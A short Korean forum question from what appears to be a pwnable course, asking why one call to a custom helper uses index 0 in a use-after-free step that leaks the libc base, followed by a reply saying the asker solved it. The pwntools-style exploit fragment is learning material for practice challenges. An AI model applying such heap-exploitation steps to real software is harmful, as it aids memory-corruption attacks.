도아주새요
강의에서 커스텀 함수로 libc 주소를 구하는데 커스텀 함수중 한곳만 idx(0)를 놓는이유는 무엇인가요?
def custom(size, data, idx):
p.sendlineafter(">", "3")
p.sendlineafter(": ", str(size))
p.sendafter(": ", data)
p.sendlineafter(": ", str(idx))
UAF to calculate the libc_base
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", 0)
custom(0x500, "B", -1)
#pwnable
작성자 정보
답변
1
탈퇴한 이용자
대표 업적 없음
아 해결 햇습니다!